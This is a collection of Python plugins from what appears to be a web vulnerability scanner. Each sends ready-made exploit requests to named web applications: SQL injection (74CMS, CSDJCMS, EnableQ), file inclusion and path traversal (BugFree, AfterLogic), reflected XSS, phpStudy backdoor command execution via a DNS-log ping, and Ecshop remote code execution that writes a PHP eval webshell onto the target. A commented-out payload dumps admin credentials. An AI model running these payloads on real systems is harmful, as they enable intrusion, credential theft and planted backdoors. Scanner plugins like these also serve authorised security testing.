def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/bugfree/Login.php" payload_url = scheme + "://" + url + ":" + str(port) + payload data = { 'xajax': 'xSelectLanguage', 'xajaxargs[]': '../../5555.txt%00', 'xajaxr': '1377604187765' } headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("System") != -1 and con.find("Build Date") != -1: Medusa = "{}存在BugFree文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/upload/admin/admin_baiduxml.php?ac=setsave' data = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("Error:Query error") != -1 and con.find( "value='aaa'") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23" # 爆用户密码用 # payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \ # %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\ # 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\ # 34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("'904c23abadd5a4648a973c86385f3930'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/r.php?qlang=cn&qid=&step=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "X-Forwarded-For": "1.1.1.1", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Content-Type": "application/json", } mail = "testvul" + str(random.randint(1000, 9999)) + "@testvul.net" data = 'administrators_Name=' + mail + '&nickName=testvul&passWord=123456&passWord2=123456&hintPass=3&answerPass=testvul&Action=MemberAddSubmit&submit=%D7%A2%B2%E1&qid=' resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text if con.find("administratorsName") != -1 and con.find( "Bad SQL Query") != -1: Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/user.php?act=login' payload_url = scheme + "://" + url + ":" + str(port) + payload randstr = chr(random.randint(96, 122)) filename_poc = randstr + '.txt' exp = "file_put_contents('{filename}','<?php eval($_GET[wss]); ?>')".format( filename=filename_poc) exp_base64 = '''{$asd'];assert(base64_decode('%s'));//}xxx''' % base64.b64encode( exp.encode('utf-8')).decode('ascii') exp_hex = binascii.b2a_hex(exp_base64.encode('utf-8')).decode('ascii') refer = '''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x%s,10-- -";s:2:"id";s:3:"'/*";}''' % exp_hex headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Referer': refer } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("wss"): Medusa = "{}存在Ecshop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl, payloadurl2] for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('PHP Version') != -1 and con.find( 'Configure Command') != -1 and con.find('System') != -1: Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port DL = Dnslog() payload = "/index.php" commandS = ('''system("ping {}");''').format(DL.dns_host()) cmd = base64.b64encode(commandS.encode('utf-8')) try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-User': '******', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Sec-Fetch-Site': 'none', 'accept-charset': cmd, 'Accept-Encoding': 'gzip,deflate', 'Accept-Language': 'zh-CN,zh;q=0.9', 'User-Agent': RandomAgent } resp = requests.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False) time.sleep(2) if DL.result(): Medusa = "{} 存在phpStudyBackdoor脚本漏洞\r\n漏洞详情:\r\nPayload:{}\r\nHeader:{}\r\nDNSLOG内容:{}\r\n".format( url, payload_url, headers, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/install/index.php?post=1" payload_url = scheme + "://" + url + ":" + str(port) + payload data = {"state": "../../../../../../../../../../windows/system.ini%00"} headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('[driver32]]') != -1: Medusa = "{}存在AfterLogic_WebMail任意文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = randoms().result(20) payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '" autofocus onfocus=alert({}) style='.format(RD)) != -1: Medusa = "{}存在74CMS存在反射型XSS漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) list = ['/index.html', '/datasource.html', '/sql.html', '/wall.html', '/webapp.html', '/weburi.html', '/websession.html', '/spring.html'] headers = { 'User-Agent': RandomAgent, "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } Pool=ThreadPool() try: for payload in list: payload_url = Url + '/druid' + payload Pool.Append(task,Url=Url,headers=headers,proxies=proxies,payload_url=payload_url,Uid=kwargs.get("Uid"),Sid=kwargs.get("Sid")) Pool.Start(thread_number) # 启动线程池 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorLog().Write("Plugin Name:"+_+" ThreadPool ",e) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) try: payload = '/pma/' payload_url = scheme + "://" + url + ":" + str(888) + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("phpMyAdmin")!=-1 and con.find("sql")!=-1 and con.find("New")!=-1: Medusa = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url,payload_url,con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None: proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) try: payload_url = Url Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" Headers["Accept-Encoding"] = "gzip, deflate" resp = requests.options(payload_url,headers=Headers,proxies=proxies, timeout=5, verify=False) if r"OPTIONS" in resp.headers.get('Allow'): Medusa = "{}存在Options方法开启漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,resp.headers) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类